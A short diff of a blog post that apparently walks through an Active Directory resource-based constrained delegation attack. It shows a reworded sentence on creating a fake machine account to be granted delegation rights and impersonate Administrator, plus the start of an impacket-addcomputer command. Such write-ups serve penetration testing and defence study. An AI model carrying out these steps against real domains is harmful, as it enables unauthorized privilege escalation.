tburakdirlik/tburakdirlik.github.io/_posts/2026-04-09-Active-Directory-RBCD-Attack.md

 ### Step 1 — Create a Fake Machine Account

-The foundation of this attack is adding a rogue computer account to the domain.
+This attack is based on adding a fake computer account to the domain.
 This account will later be granted delegation rights and will request a service ticket on behalf of Administrator.

 ```bash
 impacket-addcomputer 'domain.local/john.doe' \